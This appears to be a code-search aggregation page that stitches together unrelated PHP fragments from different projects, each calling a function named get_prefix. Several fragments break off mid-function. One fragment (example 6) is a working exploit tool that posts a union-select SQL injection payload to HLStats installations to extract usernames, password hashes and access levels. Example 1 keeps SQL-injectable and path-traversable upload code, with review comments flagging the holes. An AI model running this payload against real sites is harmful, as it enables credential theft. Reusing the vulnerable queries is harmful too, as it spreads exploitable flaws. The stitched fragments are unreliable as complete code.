示例#1
// Admin album controller: one branch per value of the "act" request parameter.
// The if/elseif chain continues past the end of this excerpt.
require dirname(__FILE__) . '/includes/init.php';
if ($_REQUEST['act'] == 'list') {
    // Render the album list page with the available album types.
    $album_types = get_album_types();
    $smarty->assign("album_types", $album_types);
    $smarty->display('album_list.htm');
    exit;
} elseif ($_REQUEST['act'] == 'ajax_list') {
    // Return the album list as JSON.
    $list = album_list();
    make_json($list);
} elseif ($_REQUEST['act'] == 'upload') {
    // Get the directory the uploaded file is stored in.
    // NOTE(review): atype_id is taken from the request and appended to the path without validation,
    // so a value containing "../" can move the target outside the album directory. Restrict it to an
    // integer id (or look it up against the known album types) before building the path.
    $targetPath = '../resource/data/album/' . $_REQUEST['atype_id'];
    // NOTE(review): the token is md5 of a fixed literal salt plus a timestamp supplied by the client,
    // so it is not bound to the session and anyone who knows the salt can recompute it. It is also
    // compared with ==, which is loose and not constant-time; a per-session token checked with
    // hash_equals() would be the safer pattern.
    $verifyToken = md5('unique_salt' . $_REQUEST['timestamp']);
    if (!empty($_FILES) && $_REQUEST['token'] == $verifyToken) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        // NOTE(review): the stored name takes its suffix from the client-supplied file name
        // (get_prefix() is not shown here; presumably it returns the extension - confirm). No
        // allow-list of image extensions or content check is visible, so verify that script files
        // cannot be stored in a directory the web server will execute from.
        $image_name = unique_name($targetPath . '/') . '.' . get_prefix($_FILES['Filedata']['name']);
        $targetFile = rtrim($targetPath, '/') . '/' . $image_name;
        // NOTE(review): the return value is ignored, so the row below is inserted and success is
        // reported even when the move failed.
        move_uploaded_file($tempFile, $targetFile);
        // NOTE(review): request and session values are concatenated into the statement. Unless
        // init.php escapes request data globally (not visible here), atype_id and Filename are
        // SQL-injectable; escape each value or use a parameterised query.
        $sql = "insert into " . $ecs->table("album") . " (class_code, type, name, path, filesize, creator, created) \r\n\t\tvalues ('" . $_SESSION['class_code'] . "','" . $_REQUEST['atype_id'] . "', '" . $_REQUEST['Filename'] . "',\r\n\t\t\t'" . $targetFile . "','" . $_FILES['Filedata']['size'] . "','" . $_SESSION['admin_id'] . "',now()) ";
        $db->query($sql);
        admin_log(addslashes($_REQUEST['Filename']), 'upload', "album_picture");
        make_json_result("上传“" . $_REQUEST['Filename'] . "”成功!");
    }
    // Reached when the token check fails; also reached after a successful upload unless
    // make_json_result() terminates the request (not visible here - confirm).
    make_json_error("上传" . $_REQUEST['Filename'] . "失败!");
} elseif ($_REQUEST['act'] == 'ajax_save') {
    // Update the name and sort order of one album row; only album_id is coerced to an integer.
    $id = !empty($_REQUEST['album_id']) ? intval($_REQUEST['album_id']) : 0;
    // NOTE(review): name and sort go into the statement unescaped (same caveat as the insert above);
    // sort could be cast with intval() if it is numeric - confirm the column type.
    $sql = "update " . $ecs->table("album") . " set name='" . $_REQUEST["name"] . "',\r\n\t\t\tsort='" . $_REQUEST["sort"] . "'\r\n\t\t\twhere album_id=" . $id;
    $db->query($sql);
    // The full SQL text is passed as the third argument of the admin log call.
    admin_log(addslashes($_REQUEST["name"] . $id), 'update', $sql);
    make_json_result("修改成功!");
} elseif ($_REQUEST['act'] == 'ajax_delete') {
示例#2
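/**
 * Builds the tree-indent markup for an eshop category and records indent
 * fragments for it in the global $prefixed map.
 *
 * For a category whose parent_id is 0 (or that has no row) the result is an
 * empty string; otherwise it is one tree-image marker. The parent category is
 * then visited recursively, which only updates $prefixed (the recursive return
 * value is not used).
 *
 * @param int|string $CategoryID Category id; coerced to an integer before use.
 *
 * @return string Indent markup for this category.
 */
function get_prefix($CategoryID)
{
    global $mysql, $prefixed;

    // The id is interpolated into SQL text below, so force it to an integer:
    // a crafted string can then no longer change the shape of the query.
    $CategoryID = (int) $CategoryID;

    // Initialise explicitly; the original appended to an undefined variable.
    $add_prefix = '';

    $ParentID = $mysql->result('SELECT parent_id FROM ' . prefix . '_eshop_categories WHERE id = ' . $CategoryID . ' ');

    $indent = isset($prefixed[$CategoryID]['f']) ? $prefixed[$CategoryID]['f'] : '';
    $prefixed[$CategoryID]['f'] = $indent . '   ';

    if ($ParentID == 0) {
        return $add_prefix;
    }

    $marker = '<img src="/engine/plugins/eshop/tpl/img/tree.gif">&nbsp;&nbsp;&nbsp;';
    $existing = isset($prefixed[$CategoryID]['s']) ? $prefixed[$CategoryID]['s'] : '';
    $prefixed[$CategoryID]['s'] = $existing . $marker;
    $add_prefix .= $marker;

    // Look the parent row up; when it is missing there is nothing to recurse
    // into (the original recursed with an undefined variable in that case).
    $parentRowId = null;
    foreach ($mysql->select("SELECT * FROM " . prefix . "_eshop_categories WHERE id=" . (int) $ParentID . " ") as $row2) {
        $parentRowId = $row2['id'];
    }
    if ($parentRowId !== null) {
        // NOTE(review): a cyclic parent chain in the table would recurse without end - confirm the data model rules this out.
        get_prefix($parentRowId);
    }

    return $add_prefix;
}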
示例#3
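/**
 * Moves attachment data held in the database "content" column to files on
 * disk and prints an HTML progress report.
 *
 * For every row whose content is not empty, the content is written below the
 * owning project's file path; on success the row is updated with the disk
 * file name and folder and its content column is emptied.
 *
 * File names and paths are HTML-escaped before they are echoed, because the
 * file name column is read back from the database and printed into the page.
 *
 * @param string $p_source Either "attachment" (bug files) or "project" (project files).
 * @return void
 */
function upgrade_move_att2disk( $p_source ) {

	# $p_source is the string "attachment" or "project"
	if( $p_source == 'attachment' ) {
		$t_file_table = db_get_table( 'bug_file' );
		$t_bug_label = "Bug";
	}
	if( $p_source == 'project' ) {
		$t_file_table = db_get_table( 'project_file' );
		$t_bug_label = "Project";
	}

	# check that the source was valid
	if( !isset( $t_file_table ) ) {
		echo 'Failure: Internal Error: File source not set';
		return;
	}

	# check that the destination is set up properly
	$t_upload_method = config_get_global( 'file_upload_method' );
	if( $t_upload_method <> DISK ) {
		echo 'Failure: Upload Method is not DISK';
		return;
	}

	$query = 'SELECT * FROM ' . $t_file_table . ' WHERE content <> \'\'';

	# errors are suppressed on purpose: a failed query is reported as "nothing to move"
	$result = @db_query_bound( $query );

	if( false == $result ) {
		echo '<p>No attachments need to be moved.</p>';
		return;
	}

	$count = db_num_rows( $result );
	echo '<p>Found ' . $count . ' attachments to be moved.</p>';
	$t_failures = 0;

	if( $count > 0 ) {
		echo '<table width="80%" bgcolor="#222222" cellpadding="10" cellspacing="1">';

		# Headings
		echo '<tr bgcolor="#ffffff"><th width="10%">' . $t_bug_label . '</th><th width="20%">Attachment</th><th width="70%">Status</th></tr>';
	}

	for( $i = 0;$i < $count;$i++ ) {
		$t_row = db_fetch_array( $result );

		// trace bug id back to project to determine the proper file path
		if( $p_source == 'attachment' ) {
			$t_project_id = bug_get_field( $t_row['bug_id'], 'project_id' );
			$t_bug_id = $t_row['bug_id'];
		} else {
			$t_project_id = (int) $t_row['project_id'];
			$t_bug_id = $t_project_id;
		}

		$t_file_path = project_get_field( $t_project_id, 'file_path' );
		$prefix = get_prefix( $t_file_path );
		$t_real_file_path = $prefix . $t_file_path;
		# NOTE(review): the write below relies on file_clean_name() to remove path
		# separators from the stored name (helper not visible here) - confirm.
		$c_filename = file_clean_name( $t_row['filename'] );

		# the stored file name is escaped so that markup in it is shown as text
		printf( "\n<tr %s><td>%8d</td><td>%s</td><td>", helper_alternate_class(), $t_bug_id, htmlspecialchars( $t_row['filename'], ENT_QUOTES, 'UTF-8' ) );

		if( is_blank( $t_real_file_path ) || !file_exists( $t_real_file_path ) || !is_dir( $t_real_file_path ) || !is_writable( $t_real_file_path ) ) {
			echo 'Destination ' . htmlspecialchars( $t_real_file_path, ENT_QUOTES, 'UTF-8' ) . ' not writable';
			$t_failures++;
		} else {
			$t_file_name = $t_real_file_path . $c_filename;
			$t_file_name_html = htmlspecialchars( $t_file_name, ENT_QUOTES, 'UTF-8' );

			// write file to disk store after adjusting the path
			if( file_put_contents( $t_file_name, $t_row['content'] ) ) {
				// successful, update database
				/** @todo do we want to check the size of data transfer matches here? */
				$c_new_file_name = $t_file_path . $c_filename;
				$query2 = "UPDATE $t_file_table SET diskfile = " . db_param() . ",
						folder = " . db_param() . ", content = '' WHERE id = " . db_param();
				$update = @db_query_bound( $query2, Array( $c_new_file_name, $t_file_path, $t_row['id'] ) );
				if( !$update ) {
					echo 'database update failed';
					$t_failures++;
				} else {
					echo 'moved to ' . $t_file_name_html;
				}
			} else {
				echo 'copy to ' . $t_file_name_html . ' failed';
				$t_failures++;
			}
		}

		echo '</td></tr>';
	}

	echo '</table><br />' . $count . ' attachments processed, ' . $t_failures . ' failures';
}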
示例#4
/**
 * Renders a triples structure as a chain of rdfQuery "$.rdf.triple(...)" calls.
 *
 * The subject URI is always the first key of $triples['result']. One call is
 * emitted per object value; calls belonging to the second and later predicates
 * are prefixed with ",\n".
 *
 * NOTE(review): the output is JavaScript source. Literal values only have
 * single quotes escaped, and URIs are inserted unchanged, so values holding
 * double quotes, backslashes or line breaks can break out of the generated
 * string. If the triples can come from an untrusted source, escape for the
 * JavaScript string context (for example with json_encode()) before emitting.
 *
 * @param array $triples Structure with a 'result' key: subject => predicate => list of
 *                       nodes, each node holding 'type' and 'value'.
 *
 * @return string Generated script text, always ending in a newline.
 */
function triples_to_rdfquery($triples)
{
    global $prefix;

    $subjectUri = key($triples['result']);
    $script = '';
    $predicateIndex = 0;

    foreach ($triples['result'] as $predicates) {
        foreach ($predicates as $predicate => $nodes) {
            // Every predicate after the first one starts with a separator.
            $separator = $predicateIndex > 0 ? ",\n" : '';
            $predicateIndex++;

            $head = $separator . "\$.rdf.triple('<{$subjectUri}> " . get_qname($predicate);
            $namespaces = "namespaces: { " . get_short_prefix($predicate) . ": '" . get_prefix($predicate) . "' }";

            foreach ($nodes as $node) {
                if ($node['type'] == 'literal') {
                    $term = ' "' . str_replace("'", "\\'", $node['value']) . '"';
                } else {
                    $term = ' <' . $node['value'] . ">";
                }
                $script .= $head . $term . " .',{\n{$namespaces}\n})";
            }
        }
    }

    return $script . "\n";
}
    $GLOBALS["VERBOSE"] = true;
}
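// Command-line dispatch: each recognised switch runs one task with the
// following argument and then stops the script.
// Read the arguments once, with defaults, so that a call without arguments
// does not raise undefined-offset warnings on every comparison.
$cliAction = isset($argv[1]) ? $argv[1] : '';
$cliValue = isset($argv[2]) ? $argv[2] : null;
if ($cliAction === "--id") {
    parse_db($cliValue);
    die;
}
if ($cliAction === "--import-id") {
    import_users($cliValue);
    die;
}
if ($cliAction === "--make-unique") {
    make_database_unique($cliValue);
    die;
}
if ($cliAction === "--get-prefix") {
    get_prefix($cliValue);
    die;
}
// Single-instance guard: stop when the PID recorded in the pid file still
// belongs to a running process.
$unix = new unix();
$pidfile = "/etc/artica-postfix/" . basename(__FILE__) . ".pid";
$pid = trim(@file_get_contents($pidfile));
if ($unix->process_exists($pid)) {
    // Report the PID of the process that is already running; the original
    // overwrote $pid with this script's own PID before printing it.
    $mypid = getmypid();
    echo "[{$mypid}]:: Process {$pid} already running...\n";
    die;
}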
function get_prefix($path)
{
    if (!is_file("{$path}.pre")) {
        $handle = @fopen("{$path}", "r");
        $d = 0;
示例#6
    }
    return $prefix;
}
if (isset($_REQUEST['target']) && $_REQUEST['target'] != '') {
    //this exploit can take its sweet time.
    set_time_limit(0);
    $http = new http();
    $addr = explode('?', $_REQUEST['target']);
    $addr = $addr[0];
    if (isset($_REQUEST['proxy'])) {
        $http->proxy($_REQUEST['proxy']);
    }
    switch ($_REQUEST['button']) {
        case 'HLStats_Logins':
            $table = false;
            $prefix = get_prefix($addr);
            //print_r($prefix);
            foreach ($prefix as $pre) {
                if (!$table) {
                    print "trying table prefix:{$pre}<br>";
                    //no comments are used in this payload,  instead a second union select is used to finnish the query.
                    $pay = "killLimit=1000%20union%20select%20username,password,acclevel,1,playerId%20from%20" . $pre . "Users%20UNION%20SELECT%201,1,1,1,1%20FROM%20" . $pre . "Players%20WHERE%201=0";
                    $resp = $http->post($addr . "?mode=playerinfo&player=1", '', $pay);
                    $table = hl_get_sql($resp);
                    //
                }
            }
            if (!$table && @(!in_array('hlstats_', $prefix))) {
                //ooah no the exploit has failed so far.
                $pre = "hlstats_";
                //try the default prefix
示例#7
文件: class.php 项目: stonyyi/anahita
 /**
  * Finds the default class for an identifier or return null.
  *
  * @param KServiceIdentifier $identifier The identifier of the class 
  * 
  * @return string|bool Return the class name or false if not found
  */
 public static function findDefaultClass($identifier)
 {
     $key = (string) $identifier;

     // Reuse a cached answer when it is a recorded miss (false) or names a class that exists.
     if (isset(self::$_defaults[$key])) {
         $cached = self::$_defaults[$key];
         if ($cached === false || class_exists($cached)) {
             return $cached;
         }
     }

     $base = 'Lib' . ucfirst($identifier->package) . KInflector::implode($identifier->path);
     $loader = KService::get('koowa:loader');

     // First choice is Lib<Package><Path><Name>, second is Lib<Package><Path>Default.
     $classname = false;
     foreach (array($base . ucfirst($identifier->name), $base . 'Default') as $candidate) {
         if (class_exists($candidate)) {
             $classname = $candidate;
             break;
         }
     }

     // Neither exists: fall back to the candidates registered for this identifier, if any.
     if ($classname === false && isset(self::$_identifiers[$key])) {
         $config = self::$_identifiers[$key];
         if (isset($config['default'])) {
             $candidates = array_unique($config['default']);
         } else {
             $candidates = get_prefix($config['prefix'], $config['name']);
             if (isset($config['fallback'])) {
                 $candidates[] = $config['fallback'];
             }
         }
         foreach ($candidates as $candidate) {
             // The path has to be found first; only then is the class loaded.
             if (!$loader->findPath($candidate, $identifier->basepath)) {
                 continue;
             }
             if ($loader->loadClass($candidate, $identifier->basepath)) {
                 $classname = $candidate;
                 break;
             }
         }
     }

     // Cache the outcome, including a miss, under the identifier string.
     self::setDefaultClass($key, $classname);

     return $classname;
 }
示例#8
 /**
  * Sends a "detach" WebSocket control message.
  *
  * @param string $channel Channel name; it is prefixed with get_prefix() below.
  */
 public function detach($channel)
 {
     // NOTE(review): the prefixed channel is built here but never handed to
     // websocket_control_message(), so the message is sent without arguments -
     // confirm whether that is intended.
     $args = array('channel' => get_prefix() . $channel);
     $controlMessage = \GripControl\GripControl::websocket_control_message('detach');
     $this->send_control($controlMessage);
 }